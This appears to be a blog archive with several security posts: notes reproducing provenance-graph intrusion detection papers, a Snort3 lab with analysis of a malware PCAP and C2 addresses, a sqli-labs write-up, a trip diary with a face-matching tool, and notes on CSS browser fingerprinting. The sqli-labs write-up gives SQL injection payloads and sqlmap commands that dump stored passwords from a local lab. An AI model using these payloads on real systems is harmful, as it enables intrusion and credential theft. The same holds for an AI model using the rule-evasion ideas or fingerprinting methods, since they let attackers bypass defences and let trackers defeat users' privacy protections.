• 像DGL (Deep Graph Library，MAGIC项目中使用的库) 或 PyTorch Geometric这样的图神经网络库，通常期望或在内部将节点表示为从0开始的连续整数ID。
  • 训练图：每个图都有自己的一套从0开始的局部节点ID。这些图被分别保存到 train.pkl 里。（没啥用处，反正训练集都是去掉恶意节点的
  • 测试图：会创建一个合并的 test_node_map (UUID -> “全局测试集”整数ID)。这个映射横跨 所有 测试文件。（评估的时候有用，保存在metadata.json中。malicious.pkl也是指测试集中的）

文件作用：

• names.json (id_nodename_map) UUID -> 可读名称，如路径或IP

  对FILE、SUBJECT_PROCESS、NetFlowObject类型的节点获取文件路径、进程名、IP

  但最终数据是不包含文件路径、进程名或IP地址的，只包含了节点的类型ID。

  训练时使用的节点特征是基于节点类型ID进行one-hot编码得到的（ utils/loaddata.py 中的 transform_graph）

• types.json (id_nodetype_map) UUID -> 类型字符串

• read_graphs(): 读取预处理后的图数据，并将其保存为模型可加载的 .pkl 文件

  • train.pkl: 包含一个列表，列表中的每个元素是一个训练NetworkX图的node-link data表示。
  • test.pkl: 包含一个列表，列表中的每个元素是一个测试NetworkX图的node-link data表示。
  • malicious.pkl: 包含一个元组，包含恶意节点的整数ID列表和它们的名称列表。
  • （新增）node_type_mapping.json 和 edge_type_mapping.json: 保存全局的类型字符串到整数ID的映射。

loaddata.py

输入阶段一生成的 train.pkl, test.pkl, malicious.pkl 以及元数据文件，加载数据并转换为DGL图，进行特征工程（节点/边类型ID进行one-hot编码）。输出单个DGL图（train_x.pkl）。

训练

评估

以下仅体现节点级别检测，流程对应model/eval.py中的 evaluate_entity_level_using_knn()。

1. 数据准备 (Data Preparation):

   • x_train: 来自所有训练图的所有节点的嵌入向量。由于训练图都是良性的，所以x_train代表了海量的、各种类型的“正常节点”的嵌入表示。
   • x_test / y_test: 来自所有测试图的所有节点的嵌入向量和它们对应的真实标签（0或1）。

2. 构建良性参考基线:

   • 基于所有正常节点的嵌入构建的K-D树（或等效结构），形成了一个“正常系统实体”的参照空间。

   论文中强调的 K-D 树不在代码显式出现，而是 sklearn.neighbors.NearestNeighbors 在调用 .fit() 时，为了优化后续 .kneighbors()的查询速度而内部构建的高效索引结构。

3. 计算异常分数 (Calculating Anomaly Score):

   • 缓存机制: 代码会检查eval_result/distance_save_{}.pkl是否存在。因为计算所有测试节点到所有训练节点的距离非常耗时，所以第一次计算后会把结果缓存下来，方便后续快速重复实验。
   • distances_train_sample, _ = nbrs.kneighbors(x_train[idx][:50000], ...): 从海量的正常训练节点中随机采样一小部分（最多5万个），计算它们内部的k近邻平均距离mean_distance，作为“正常节点”的距离基准。
   • distances_test, _ = nbrs.kneighbors(x_test, ...): 为测试集中每一个节点，在x_train（正常节点参照系）中找到其k个最近的邻居。
   • current_distances = distances_test.mean(axis=1): 计算每个测试节点的k近邻平均距离。
   • score = current_distances / (mean_distance + 1e-9): 同样进行归一化，得到每个测试节点的异常分数。

4. 评估 (Evaluation):

   • auc = roc_auc_score(y_test, score): 使用每个节点的异常分数和真实标签计算总体性能。

   有个神奇的地方，代码的 model/eval.py 中针对不同数据集硬编码了距离阈值，从而确保复现论文中的结果。实际上改为通过 max f1 的方法来选定 threshold 效果实测也差不多。

   

   此外还学到了一个 sklearn 一个挺有用的用法 precision_recall_curve() ，用于自动评估二分类模型性能：

   它接收真实的标签列表 (y_test) 和模型预测的“置信度分数”或“概率分数”列表 (score) 作为输入。这个 score 越高，代表模型认为样本属于正类（在这里是恶意节点）的可能性越大。

   precision_recall_curve 会将所有出现过的 score 值（或者说，是一些关键的 score 值）作为潜在的阈值。对于每一个这样的潜在阈值，它都会计算出一对 (精确率, 召回率)。

   因此，它返回的 threshold 列表，就包含了所有这些被考虑过的决策阈值点。返回的 prec 和 rec 数组则是在这些相应阈值点（或阈值区间）上的精确率和召回率。

总结与思考

待更新…

知识补充

DGL

DGL（深度图库）使用稀疏矩阵表示，大大减少了计算和内存需求。对于稀疏图，计算复杂度与边的数量相关，而不是节点数量的平方。

邻接表与邻接矩阵

参考：https://zhuanlan.zhihu.com/p/630675964

邻接表 是一种链表的集合。对于每个顶点，邻接表中都有一个链表，链表中存储着与该顶点直接相连的其他顶点。

示例： 考虑下面这个无向图：

1
2
3
4
5

    A
   / \
  B---C
 / \ / \
D---E---F

使用邻接表来表示该图的结构如下：

1
2
3
4
5
6

A -> B -> C
B -> A -> C -> D -> E
C -> A -> B -> E -> F
D -> B -> E
E -> B -> C -> D -> F
F -> C -> E

邻接矩阵 是一个二维矩阵。矩阵的行和列分别代表图中的顶点，矩阵中的元素表示对应顶点之间是否存在边。

示例： 继续使用上述无向图的示例，使用邻接矩阵来表示该图的结构如下：

1
2
3
4
5
6
7

   A  B  C  D  E  F
A  0  1  1  0  0  0
B  1  0  1  1  1  0
C  1  1  0  0  1  1
D  0  1  0  0  1  0
E  0  1  1  1  0  1
F  0  0  1  0  1  0

邻接矩阵的优点是在查找特定边的操作上非常高效，时间复杂度为O(1)。同时，邻接矩阵还可以方便地进行图的遍历和某些图算法的实现。然而，邻接矩阵需要较大的存储空间，在稀疏图的情况下，可能会浪费大量的存储空间。

稠密表示与稀疏表示

只存储矩阵中的非零元素（即实际存在的边）及其位置（行和列索引）。

常见格式：

• COO (Coordinate List): 存储一个元组列表 (row_index, col_index, value)。

• CSR (Compressed Sparse Row): 使用三个一维数组：一个存储非零元素的值，一个存储非零元素的列索引，一个存储每行非零元素的起始位置。

• CSC (Compressed Sparse Column): 类似于CSR，但按列压缩。

AUC 评估指标

AUC（Area under curve，曲线下面积） 是 ROC 曲线（Receiver Operating Characteristic Curve）下的面积。

• ROC 曲线：横轴是 FPR（假正率），纵轴是 TPR（真正率），通过不同阈值下模型输出的预测概率计算出来的。
• AUC 值的范围：[0, 1]
  • 1.0：完美分类器
  • 0.5：和随机猜测一样（无区分能力）
  • <0.5：模型在反着预测（可以通过翻转标签改进）

本文是我在《网络与信息系统安全》课程上完成的实验报告，简单整理了一下，涵盖 Snort3 在 Ubuntu 平台上的编译安装、规则维护、分析恶意流量并编写自定义规则；sqli-labs 简单测试和防御。

实验2-1: Snort入侵检测系统（IDS）部署与攻击测试

安装

实验环境

• 运行环境：Ubuntu 24.04 LTS Cloud-init
• VM配置：4 vcpu, 4GB RAM
• 虚拟化平台：Proxmox VE 8.3.0
• 网络拓扑：
  • Target（运行Snort的主机）：192.168.10.169
  • Attacker：192.168.10.168

编译安装

安装过程参考官方文档：https://docs.snort.org/start/installation

1. 安装 LibDAQ

   Snort 3 LibDAQ 为与数据源（如网络接口）通信提供了一层抽象。从源码编译安装：

   1 2 3 4

   $ git clone https://github.com/snort3/libdaq.git $ cd libdaq $ ./bootstrap

   

   发现缺少 bootstrap，那么我们使用 apt 安装它。

   sudo apt install autoconf

   继续执行 ./bootstrap，发现有报错：

   

   有许多未定义的宏，应该是由 Autoconf、Automake、m4、Libtool 等工具链提供的。尝试完善构建依赖的安装：

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

   sudo apt update sudo apt install -y \ autoconf \ automake \ libtool \ m4 \ pkg-config \ build-essential # snort 可能依赖的额外头文件一并安装一下 sudo apt install -y \ libpcap-dev \ libpcre3-dev \ libdumbnet-dev \ bison \ flex \ zlib1g-dev \ liblzma-dev \ openssl \ libssl-dev \ libnghttp2-dev

   继续执行 ./bootstrap，没有报错了，继续进行我们 LibDAQ的安装。

   1 2	$ ./configure --prefix=/usr/local/lib/daq_s3 $ sudo make install

   随后添加其 lib 目录到 ld.so.conf 中：

   echo '/usr/local/lib/daq_s3/lib/' > /etc/ld.so.conf.d/libdaq3.conf

   执行 sudo ldconfig 更新链接。随后可以 ldconfig -p验证一下。

   

2. 安装 Snort

   首先安装 Cmake：sudo apt install cmake

   以 /opt/snorty 为示例安装路径：

   1 2 3 4 5 6 7 8 9 10 11 12 13

   $ git clone https://github.com/snort3/snort3.git # 切换到 root 用户安装 $ sudo -i $ export my_path=/opt/snorty $ mkdir -p $my_path $ cd snort3 # 配置 pkg-config 环境变量以找到libdaq $ export PKG_CONFIG_PATH=/usr/local/lib/daq_s3/lib/pkgconfig:$PKG_CONFIG_PATH $ ./configure_cmake.sh --prefix=$my_path \ --with-daq-includes=/usr/local/lib/daq_s3/include/ \ --with-daq-libraries=/usr/local/lib/daq_s3/lib/

   安装 Required Packages：

   1 2 3 4 5 6 7 8 9 10 11 12 13 14

   sudo apt-get update sudo apt-get install -y \ cmake \ libdumbnet-dev \ flex \ build-essential \ libhwloc-dev \ luajit \ libluajit-5.1-dev \ libssl-dev \ libpcap-dev \ libpcre3-dev \ pkg-config \ zlib1g-dev

   发现还会缺少 libpcre2：

   

   sudo apt-get install libpcre2-dev 安装即可。

   最后 configure 完成：

   

   进行编译并安装：

   1 2 3

   $ cd build $ make -j $(nproc) $ make install

   安装成功后，添加进环境变量。

   1 2	echo 'export PATH="/opt/snorty/bin:$PATH"' >> ~/.zshrc source ~/.zshrc

   

测试检测

1. 准备 Lua 脚本

   将源代码仓库中 lua/拷贝至 snort 安装目录，方便后续调用：

   cp -r lua /opt/snorty/

2. 准备 .rules 规则

   从官网下载社区版本的规则库：https://www.snort.org/downloads

   例如我下载的是：https://www.snort.org/downloads/community/snort3-community-rules.tar.gz

   在 snort 安装目录创建 rules/目录，将解压后的 snort3-community.rules 拷贝进去。

3. 准备 pcap 包

   最简单的测试方法就是让 snort 读取 pcap 包并生成告警。我这里准备了 Ruoyi-4.2 SquirrelMail-1.4.22 Typecho1.0 nexus-3.21.1 这四个服务的良性和恶意流量数据，用于测试。

   

4. 测试规则解析

   snort -c /opt/snorty/lua/snort.lua -R /opt/snorty/rules/snort3-community.rules

   正常应该输出：Snort successfully validated the configuration (with 0 warnings).

   

5. 测试检测效果

   找一个恶意IDS，测试是否能检测到恶意行为。我们使用nefu大学的Maple IDS开源数据集，下载一个恶意pcap：https://maple.nefu.edu.cn/dataset/download/0-Maple-IDS/LOIC/http_ddos_http_loic_random.pcap

   执行snort -q -c /etc/snort/snort.lua -R /etc/snort/snort3-community.rules -r http_ddos_http_loic_random.pcap -A alert_fast，看到成功产生了3条报警。

   

规则维护

由于 Snort 是规则驱动的 IDS，因此规则的编写质量对于检测效果有重要的影响。在本次大作业中，从 Github 社区寻找了一个 APT 场景中的 pcap 包 malware.pcap，首先对其进行人工观察分析，抽取出行为模式，进行 snort 的 rules 规则编写。

攻击行为分析

使用 wireshark 打开 malware.pcap，筛选 HTTP流量，发现有下载 ooiwy.pdf 的请求，但根据文件头判断，其应该是一个 Windows 可执行文件。

使用微步沙箱进行检测，发现其已经被分析过且在恶意样本库中。

1

SHA256: f25a780095730701efac67e9d5b84bc289afea56d96d8aff8a44af69ae606404

该二进制是加壳的，运行后存在使用 sleep 拖慢分析、探测外网 IP、修改内存属性等行为。

值得关注的是，在不同的沙箱运行环境中，网络行为有所差异：Win10 中只请求了几个内网IP地址，Win7 64bit中却请求了更多，包括 184.74.99.214 、46.99.175.217 、185.56.175.122 等。查询该 IP 的威胁情报，发现多个来源的情报均将其标记为恶意。

然而，在PCAP包中过滤 ip.host==184.74.99.214 并没有结果。让云沙箱再次执行分析，发现请求了不同的地址，推测是通过DNS解析之后再请求C2地址。Win10中没有请求，且执行流程有较大差异，可能是无法在Win10上正常执行。

PCAP包中可观察到明显的C2回连特征，用HTTP协议连接到 103.148.41.195:443，上报了自己的系统信息。

自定义规则编写

根据上面的分析，一种合理的方式是：对HTTP响应中，响应体为X86 SHELLCODE，但uri不包括.exe的流量进行告警。因为这通常意味着攻击者将一个可执行文件，伪装成其他文件来传播。

经过多次调整，最终写出以下规则：

1
2
3
4
5
6
7

alert http $EXTERNAL_NET any -> $HOME_NET any (
    msg:"HTTP traffic with non-.exe executable file detected";
    content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90|";
    content:!"\.exe"; http_uri;
    sid:1001;
    rev:2;
)

运行检测，成功输出告警！

检测到{TCP} 185.244.41.29:80 -> 10.8.19.101:49748存在该行为，与我们人工分析PCAP相符。

1. 精确性

   我们编写的 sid:1001 规则成功检测到了伪装成 PDF 的可执行文件下载行为。评估该规则的精确性，它是否可能产生误报（False Positives）？例如，是否存在合法的、非.exe 文件但包含了类似 |90 90 90 ...| (NOP Sled) 的二进制数据？

   针对这种思考，我们可以尝试增强 sid:1001 的匹配规则，尝试结合 file_data 关键字或其他更精确的文件内容检测方法，减少对 NOP Sled 的单一依赖，提高规则的鲁棒性。

2. 覆盖性

​该规则是否可能产生漏报（False Negatives）？攻击者可以通过哪些方式绕过此规则？

• 使用不同的填充字节代替 0x90。
• 对可执行文件进行加密或编码。
• 使用 HTTPS 协议进行传输（如果 Snort 未配置 SSL/TLS 解密）。
• 将可执行文件分块传输。
• 修改 URI，使其包含 .exe 但实际文件内容不是 Windows 可执行文件。

​针对以上思考，后续的优化思路可以包括：

• 使用更精细和灵活的方式定义规则：Snort3 开始引入了 Lua 脚本，可以弥补 rules 的单一使用的不足。
• 基于机器学习的方式检测：可以一定程度上缓解因加密引起的漏报，例如使用 Lua 脚本调用外部 API，实现智能检测。但这会引入额外的延迟和性能开销，在 IDS 模式中比较适用，IPS 可能无法容忍这种开销。

实验2-2: SQL注入攻击原理与检测技术实践

靶场搭建

直接使用 docker 进行搭建，没找到官方的镜像，但 acgpiano/sqli-labs 有 50k 的pull，经测试功能正常。

1
2

docker pull acgpiano/sqli-labs
docker run -dt --name sqli-lab -p 80:80 acgpiano/sqli-labs:latest

随后访问 http://my-server，进入 sqli-labs 界面，首先初始化数据库。

成功之后即可进行实验。

手工注入

以 POST 类型的 error-based 注入为例（Less-11）：

使用 admin'作为用户名，出现报错，可判断注入点应该在此处。

使用 burpsuite 拦截下请求，以方便调试。

1. 爆破列数

   uname=admin' order by 2-- &passwd=1&submit=Submit

   有两列。

2. 获取库名

   使用 information_schema 获得：

   uname=admin' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata)-- &passwd=1&submit=Submit

   

3. 获取security库的表名

   uname=admin' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')-- &passwd=1&submit=Submit

   

4. 获取字段名

   uname=admin' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')-- &passwd=1&submit=Submit

   

5. 获取数据

   uname=admin' and 1=2 union select (select group_concat(username) from security.users),(select group_concat(password) from security.users)-- &passwd=1&submit=Submit

   

   至此，相当于拿到用户的明文密码了。

自动化注入检测

使用 sqlmap 尝试自动化。

sqlmap -u 'http://192.168.10.169/Less-11/' --forms

识别到 uname 有4种注入类型：

如果要获取数据，也是首先拿数据库名：

sqlmap -u 'http://192.168.10.169/Less-11/' --forms --batch

其次获得获得表：

sqlmap -u 'http://192.168.10.169/Less-11/' --forms --tables --batch -D security

拿users表中的数据：

sqlmap -u 'http://192.168.10.169/Less-11/' --forms --dump --batch -D security -T users

修复与防御

进入到容器中，到 /var/www/html 下访问源码。

我们使用参数化/预编译查询修复sqli-lab这个题目中的sql注入漏洞，将index.php进行修改：

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

修改后的源码：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

<?php
include("../sql-connections/sql-connect.php"); 
error_reporting(0);
$dbhost = 'localhost'; 
$dbuser = 'root';      
$dbpass = '';          
$dbname = 'security';  
$link = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
if (mysqli_connect_errno()) {
    printf("Connect failed: %s\n", mysqli_connect_error());
    exit();
}
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);

    
$sql = "SELECT username, password FROM users WHERE username = ? AND password = ? LIMIT 1";
    
    if ($stmt = mysqli_prepare($link, $sql)) {
        
        mysqli_stmt_bind_param($stmt, "ss", $uname, $passwd);
        
        mysqli_stmt_execute($stmt);
        
        $result = mysqli_stmt_get_result($stmt);
        
        $row = mysqli_fetch_array($result, MYSQLI_ASSOC); 
        if($row)
        {
            echo "<br>";
            echo '<font color= "#FFFF00" font size = 4>';
            echo '<font size="3" color="#0000ff">';
            echo "<br>";
            echo 'Your Login name:'. htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8'); 
            echo "<br>";
            echo 'Your Password:' .htmlspecialchars($row['password'], ENT_QUOTES, 'UTF-8'); 
            echo "<br>";
            echo "</font>";
            echo "<br>";
            echo "<br>";
            echo '<img src="../images/flag.jpg"  />';
            echo "</font>";
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            
            if(mysqli_error($link)){
                print_r(mysqli_error($link));
            } else {
                 echo "Login Failed!"; 
            }
            echo "</br>";
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
        
        mysqli_stmt_close($stmt);
    } else {
        echo '<font color= "#ff0000" font size="3">';
        echo "SQL statement preparation failed: " . mysqli_error($link);
        echo "</font>";
    }
    
    mysqli_close($link);
}
?>

发现无法实现注入，修复完成。

《KAIROS: Practical Intrusion Detection and Investigation using Whole-system Provenance》是图级别溯源图IDS的方法，发表在S&P24，本文是对其简单阅读和复现的记录。复现过程中遇到了几处环境问题，做了对应解决。

关键方法

时间窗口队列异常分数计算

KAIROS会根据每个时间窗口的可疑节点来增量构建时间窗口队列。

• 如果一个新的时间窗口与现有队列中的某个时间窗口存在共同的可疑节点，那么这个新的时间窗口就会被添加到该队列中；
• 若不存在共同的可疑节点，则会创建一个仅包含该新时间窗口的新队列。

当一个新的时间窗口被添加到队列中时，KAIROS会基于重建误差更新该队列的异常分数，若异常分数超过阈值，KAIROS就会认为该队列异常并触发警报。

TGN

文中KAIROS的TGN Encoder是对边进行嵌入，MLP Decoder 获得该边的预期类别（9种）。

训练阶段：可训练的是TGN、MLP两个模型的参数，目标是最小化实际边类型和从边嵌入预测的边类型之间的差异（交叉熵损失），即重建误差（Reconstruction Error，RE）。

检测阶段：根据边的重建误差，更新队列异常分数。

超参数

• 邻域采样大小|N|：取经验值20。

  例如在E3 - THEIA数据集中，约97%的节点邻域大小为20或更小。

• 追踪 State Update 的时间窗口：未讨论，但提到默认时间窗口|tw| 为15分钟。

检测策略

如果一个节点满足以下两个属性，则该节点在时间窗口T内是可疑的：

• 异常性：如果一个节点是一条边的源节点或目标节点，且该边的重构误差大于重构阈值，那么这个节点就是异常的。
• 稀有性：如果一个节点对应的系统实体在良性执行中不经常出现，则该节点是稀有的。使用逆文档频率（IDF）来计算节点的稀有性。

复现过程

提供了预训练权重：https://drive.google.com/drive/u/0/folders/1YAKoO3G32xlYrCs4BuATt1h_hBvvEB6C

环境搭建问题

1. scikit-learn和numpy版本兼容性问题

   

   作者给的readme也提到了这个问题（应该）

   

   根据发行时间推算scikit-learn==1.2.0对应的numpy版本：

   

   最终解决：

   1 2	pip uninstall scikit-learn numpy pip install scikit-learn==1.2.0 numpy==1.23.5

2. torch_geometric 报错Not compiled with CUDA support

   

   实际上是torch_scatter报错了，首先卸载：pip uninstall torch_scatter

   去官方下对应torch和cuda版本的：

   wget https://data.pyg.org/whl/torch-1.13.0%2Bcu117/torch_scatter-2.1.1%2Bpt113cu117-cp39-cp39-linux_x86_64.whl

   安装：

   pip install ./torch_scatter-2.1.1+pt113cu117-cp39-cp39-linux_x86_64.whl

   测试：

   1 2 3 4 5 6 7

   import torch import torch_scatter x = torch.rand(5, device='cuda') index = torch.tensor([0, 1, 2, 0, 1], device='cuda') output, argmax = torch_scatter.scatter_max(x, index) print(output)

3. attack_investigation报错缺库：

   

   pip install python-louvain

知识补充

图学习任务类型

在溯源图IDS中，感觉可以将基于图学习的方法分为三种，取代表性的文章简单归类了下，后面有时间再更新。

1. 图学习+分类模型

   首先经过图学习模型（例如GCN），然后输入到标准的分类器中（例如MLP等），输出标签为恶意/良性，训练任务就是最小化交叉熵损失。

   代表方法：

   • Flash：两层GraphSage，随后softmax输出01概率

2. 图学习+重建损失异常

   训练模型来重建节点或者边特征，例如节点/边的类别、特定节点间是否存在通路等。在检测阶段，如果某处重建误差高于阈值，则认为是可疑节点。

   代表方法：

   • Kairos：TGN Encoder+MLP Decoder，预测边类型

3. 图学习+嵌入向量库

   先嵌入后聚类，例如基于良性数据构建良性行为“基线”。通常要求很好的嵌入质量。

   • Magic：图自动编码器+GAT，随机设置一些mask来让模型重建。随后基于良性数据嵌入得到K-D树，预测阶段使用KNN计算异常分数。

社区发现

Kairos采用了louvain社区发现来划分攻击子图，确实可以将时间窗口内一整个大图划分为几个sub_graph，而且效果看起来挺好的。

参考： https://zhuanlan.zhihu.com/p/556291759

1. 社区

   在最常见的社交网络中，每个用户相当一个点，用户之间的互相关注、点赞、私信等形成了边，用户以及相互作用关系构成了一个大的关系网络。在这样的网络中，有的用户之间的连接较为紧密，有的用户之间的连接关系较为稀疏。其中连接较为紧密的部分可以被看成一个社区，其内部的节点之间有较为紧密的连接，而在两个社区间则相对连接较为稀疏，整个整体的结构被称为社团结构，如下图，红色的黑色的点集呈现出社区的结构。

   

2. 模块度

   在各类网络中会存在一些紧密连接的区域，这些区域（节点集）通常有自己的属性，称为社群或者社团（Community），社团内部连接紧密，而社团外部的连接则相对稀疏，即“内紧外松”。

   “社群检测”等同于“给节点分组”，模块度（Modularity）是一种常用的衡量节点分组质量的标准，模块度越高说明所检测到的社团越符合“内紧外松”的特征，分组质量越好。

3. 模块度最大化算法

   该方法的目标是从所有可能的分组中找到使得模块度最大的分组，由于穷举所有可能的分组十分困难，所以实际的算法都采用近似优化方法。例如，Mark Newman 提出了模块度最大化的贪婪算法Fast NewMan (FN)。贪婪算法的原理是找出每个局部最优值，最终将局部最优值整合成整体的近似最优值。

   

前段时间趁实验室同学来京参赛，一起约着去了一趟环球影城（北京环球度假区，UniversalBeijingResort）。虽是淡季的工作日，但不得不说环球人气真的火爆。尽管如此，玩完之后还是觉得很值的。

估计很多人来此的重要动机之一就是看哈利波特展区，这个展区确实是整个园区最精致的部分。霍格沃茨魔法学校附近绝对是出片的好地方，有不少商拍摄影师在此跟拍，演出也非常还原（尽管我并没看过哈利波特）。

城堡比欢乐谷的精致许多。

进入城堡内部，准备体验禁忌之旅。

功夫熊猫主题的室内展馆也十分精致，有着非常不错的置景和灯光。

作为过山车爱好者，霸天虎惊险程度 > 刺激程度，二刷了。

环球的夜景被许多人低估了，来拍人像的话真的很出片。

仿佛看到了 GTA 里面的梦中游乐园。

正宗美式效果。

晚上赶上了城堡的灯光秀。

再见啦👋。

想法

一天下来走了许多冤枉路，步数达到了2.4万。正好运动相机录制了许多素材，能否分析一下有没有与我们重复相遇的人呢，相遇时间间隔是多少？

有了这个点子后，打算写个小工具来实现。

技术选型

之前就了解过InsightFace，对亚洲人识别效果很好。Faiss是个向量数据库，在LLM领域的RAG中常用到，当然也可以用来对比人脸 Embedding 向量的相似度吧。

1. InsightFace：开源的高精度人脸识别框架
2. Faiss：Facebook AI开发的相似性搜索库，专为大规模向量检索优化
3. FFmpeg：用于高效视频处理的命令行工具，可以提取视频帧

实现思路

工作流程如下：

1. 视频分割：将运动相机录制的视频按每秒提取一帧，并以时间戳命名
2. 人脸检测与特征提取：识别每一帧中的人脸，并提取人脸特征
3. 人脸匹配与数据库构建：比较人脸特征相似度，构建人脸出现记录
4. 时序分析：分析人脸出现的时间模式，计算相遇显著性

代码实现

具体代码放在了 Github：BaiHLiu/AreWeMeetBefore

结果分析

使用 pandas 做了一些简单的分析。我希望找到的是相遇间隔最长的人脸，且图片为每秒截取一张，短时间内可能存在多张相同人脸出现。定义 $S_i$ 为人脸 $i$ 的得分，$\varDelta T_i$ 为最后与最早相遇时间之差，$C_i$ 为人脸 $i$ 出现的次数。直观的想法为 $S_i$ 与 $\varDelta T_i$ 成正比，与 $C_i$ 成反比。

进行归一化，定义归一化的时间跨度 $\hat{T}_i$ 和归一化的出现次数 $\hat{C}_i$ ：

$$\hat{T}i = \frac{\Delta T_i - \min{j}(\Delta T_j)}{\max_{j}(\Delta T_j) - \min_{j}(\Delta T_j)}$$

$$\hat{C}i = \frac{C_i - \min{j}(C_j)}{\max_{j}(C_j) - \min_{j}(C_j)}$$

人脸得分 $S_i$：

$$S_i = \frac{\hat{T}_i}{\hat{C}_i}$$

去除同伴等误报后，发现最长间隔才 5 分多，差评。

本文是我在《Web 追踪前沿》上论文阅读作业之一。 Fashion Faux Pas: 绕过浏览器反指纹防御的隐性风格指纹。文章主要探索如何在不使用 JavaScript 的情况下生成浏览器指纹，以绕过现有浏览器的反指纹防御措施。核心在于利用不同环境对 HTML 元素渲染的差异性和 CSS 的媒体查询特性构造探针 HTML 元素，再配合 iframe 获取元素尺寸，从而反推出用户环境信息，据此提出了风格指纹的（Stylistic Fingerprints）概念。实验表明该方法在多款隐私导向型浏览器上均有效，与 FingerprintJS 的识别能力相当，且优于现有的 CSS 风格指纹。文章发表在 IEEE S&P 2023，作者来自伊利诺伊大学芝加哥分校和 IBM 公司。

背景和动机

浏览器指纹识别发展与问题

越来越多的用户、法律法规关注到浏览器指纹引起的隐私问题。在现代隐私导向的浏览器环境中，传统的基于 JavaScript 的指纹有效性受到可靠性挑战，有许多反跟踪防御技术：

1. 限制特定 API 调用：例如 Tor 浏览器会阻塞 Canvas API，某些浏览器可能会限制 WebRTC 的调用。
2. 随机化 API 返回值：例如 Brave 浏览器对 Canvas API 返回值进行随机化，WebGL、User-Agent 和硬件信息随机化等。
3. 限制系统资源访问：Firefox 限制网站可使用的系统字体，防止网站利用字体信息识别用户设备。

同时，新的指纹技术还需考虑性能开销问题，否则会阻碍其在现实世界中的部署。

研究动机

• 浏览器在不同的环境中呈现的 HTML 元素是不同的，受浏览器、OS、屏幕尺寸、系统字体等影响。CSS 具备媒体查询、字体加载等能力。
• 鉴于现有反跟踪防御主要针对基于 JavaScript API 的指纹技术，本文探索如何在不使用 JS API 的情况下生成指纹，通过利用 HTML 和 CSS 特征来推断用户环境信息，提出隐式风格浏览器指纹（stylistic fingerprints）的概念。
• 证明追踪者可利用其他特征和隐式技术追踪用户，且不受现有先进防御措施的影响。

实现效果

• 有效性：对包括 Safari、Firefox、Brave、Tor 等隐私导向型浏览器做了实证分析，证明了其有效性。同时，进行了一项时长9周的真实世界部署，结果显示该方法与 FingerprintJS 效果相当。同时还计算了指纹特征的熵，表明其较高的辨别性。
• 高效性：在性能开销上与 FingerprintJS 相比对页面渲染影响可忽略不计，用户交互延迟小于 100ms。
• 全面性：比先前 CSS 技术收集数据更全面，且对浏览器防御措施更具鲁棒性。

设计与实现

风格指纹

风格指纹是由网页呈现器生成的视觉属性构建而成的特征，完全依赖 CSS 和 HTML 元素，而无需调用 Javascript API。想实现这一点，有几个重要挑战：

• 须选择具有辨别能力的 HTML 元素，且需要在屏幕上有策略地排列，以保持稳定的指纹。
• 隐式方法推断特征可能会导致难以计数的网络请求，需要一种巧妙的设计。
• 需要一种有效的方法来编码 HTML 元素中的可用信息，以便服务器能够实际创建指纹。

CSS @media query 特性

CSS3 中的 @media 查询可以针对不同显示媒介和屏幕尺寸定义不同的样式，例如指定屏幕宽度小于 300 px 时的样式：（📺 demo 01-css3-media-query）

1
2
3
4
5

@media screen and (max-width: 300px) {
    body {
        background-color:lightblue;
    }
}

iframe 诱导的元素尺寸查询

@media 查询只能查询窗口或屏幕的尺寸，无法测定具体的 HTML 元素。因此通过引入 iframe 来诱使 @media测量元素的尺寸。

一个直观的实施方案为，每个 HTML 元素配合一个iframe使用，然而这样一来查询太多，对页面加载时间产生负面影响。因此采用对角排列元素来获得所有三个元素的尺寸之和。

这样一来，通过置入大量@media 查询，从服务器的请求记录中就可以得知目标 HTML 元素的尺寸。

【问题：】用 min-width 属性以升序排序，当一个匹配到之后，后面的尺寸就不用再测试了吧，如何停下来的呢？

识别方法

使用 25 个 iframe 和 339 个 HTML 元素，能够探测 30 种指纹特征，根据其指纹特征的类型分为四类：环境（Environment）、字体（Fonts）、广告拦截器（Ad blocker presence）、CSS 媒体属性（CSS media properties）。系统将这些探针元素都放置在一个 $800 \times 1000$ px 的 iframe 中，称为 main iframe。

Environment 识别

浏览器在不同的环境中呈现的 HTML 元素是不同的，受浏览器、OS、屏幕尺寸、系统字体等影响。例如对于 <textarea> 元素，在 MacOS Monterey 的 Chrome v99 中呈现的尺寸为 430px/150px，而在 Windows 11 中呈现为 432px/162px，在 Ubuntu 18.04 为 348px/145px。当浏览器版本发生变化（如 v93）时，这些尺寸也可能不同。文章使用了 101 种不同类型的 HTML 元素。

Fonts 识别

对于字体识别，一种常见的方案是：枚举一些 @font-face 规则，为每个字体设置远程加载 URL，如果字体存在本地，则不会请求伪造的 URL。

这种方式会导致大量的 HTTP 请求，为了减少这种性能开销，作者开发了一种基于元素尺寸的新型字体指纹识别方法：为一个 <span> 元素分配一个 Tesing font family 以及两个 fallback fonts，这里选用 Arial Black 和 Arial 作为回退字体，因为 Arial Black 在多数系统中存在且比其他字体家族宽度大。当测试字体家族不可用时，元素会回退到 Arial 进行渲染；若测试字体可用，则元素不会使用回退字体且会以不同尺寸渲染，通过观察元素尺寸变化来判断字体是否可用。【📺 demo 02-fonts-query】

Ad blocker 识别

使用 <img> 和 <div> 创造能命中常见广告拦截器（例如 AdBlock、AdGuard ）的元素，如果存在广告拦截器，则诱使广告拦截器删除该元素，不会请求对应 URL。

CSS media properties 识别

